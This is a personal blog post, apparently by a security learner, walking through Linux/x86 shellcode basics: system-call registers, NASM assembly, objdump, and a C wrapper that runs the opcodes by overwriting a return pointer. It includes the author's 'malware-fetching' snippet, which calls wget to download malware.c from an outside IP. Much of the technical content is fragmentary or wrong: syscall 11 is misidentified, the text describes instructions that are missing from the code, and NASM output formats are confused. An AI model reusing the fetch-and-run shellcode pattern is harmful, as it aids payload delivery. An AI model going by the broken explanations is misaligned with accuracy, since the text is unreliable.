Over the last couple of years I’ve discussed ways of getting malware onto a network, and basically what could be achieved after vulnerabilities are exploited. I haven’t gone into the granular details of how the exploits themselves work, and this is something I must get a handle on, one way or another.
I’ve started by asking ‘What is shellcode’? According to Wikipedia: ‘shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called “shellcode” because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode.’
I suppose a classic example of this would be a buffer overflow, the shellcode being what’s carried into the next buffer for execution. For this to happen, there must be a vulnerability, and an exploit must be created to set things up for the shellcode to execute.
Assembler coding is something I haven’t touched since my microelectronics days with the Motorola 68000. Disassembling a random sysinternals binary (an example) gives an output that, on the surface, looks almost unintelligible to most of us:
However, it only looks mystifying because it lacks context on its own. Let’s create some context by noting two features of the language:
* Very limited vocabulary. Assembler code is created with only a handful of commands (add, sub, mov, etc.) each representing a circuit within the microprocessor that performs a specific operation with whatever values are passed to it.
* Each memory register (EAX, ECX or whatever) is basically a ‘buffer’ connected physically to something on the microprocessor board, whether it be a memory chip, I/O port, pretty flashing LEDs, etc. etc. It follows that a value passed to a register connected to an I/O port will result in a given output.
Shellcoding for the Linux/x86 Architecture
This principle is best illustrated with shellcode created for a UNIX-based system, as there is a definite set of system calls mapped to specific values in /usr/src/linux/include/asm-i386/unistd.h (for the i386 architecture), and a specific register the values are stored in during runtime (in this case EAX). Meanwhile, the arguments/parameters for a system call are stored in registers EBX, ECX, EDX and several others. I haven’t the slightest idea what the equivalent is for a Windows operating system.
With this in mind, it’s now much easier to understand a segment of code I robbed from the InfoSec Institute’s site:
mov eax, 11
mov edx, 0
It places value ’11’ in register EAX, which refers to the listxattr() function in /asm-i386/unistd.h (or at least it does on my machine). Next, the code places ‘cmd‘ as an argument in EBX and ‘file‘ in ECX. It then uses the ‘push‘ instruction to cause the function to execute with both ‘cmd‘ and ‘file‘ as arguments. The ‘int 80h‘ causes a system interrupt that switches between the kernel and user spaces.
But Wait! There’s More!
Our shellcode does nothing on its own, as it’s not a binary/executable. The latter must be in a specific format (ELF) in order for a UNIX system to execute it, with a data section and a text section. And just to make things more complicated, the values in our shellcode are mapped to other command arguments in the data section, as my own little malware-fetching example shows:
;/bin/cat /etc/getmalware .data
get db '/bin/wget', 0
file db '22.214.171.124/malware.c'
mov eax, 203
mov edx, 0
Getting the Payload to Execute
Another problem is we can’t get the shellcode to execute unless it’s already in a buffer with the system’s instruction pointer pointing at it (which should happen after a buffer overflow). What’s needed is a C program that buffers and executes its opcode.
I’ve used the Netwide Assembler (NASM), which generates the object code for Win32 systems, then used objdump (part of the binutils library) to get the opcodes.
To assemble the code:
$ nasm -f elf Malware-Fetch.asm
To dump the object code:
$ objdump -d Malware-Fetch.o
This gives us some opcodes in the second column of the output, which are reformatted and put into a little C container that should look something like:
char shellcode = "\x2f\x62\x69\x6e\x2f\x77\x67\x65\x74\x00\x31\x39\x32"
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;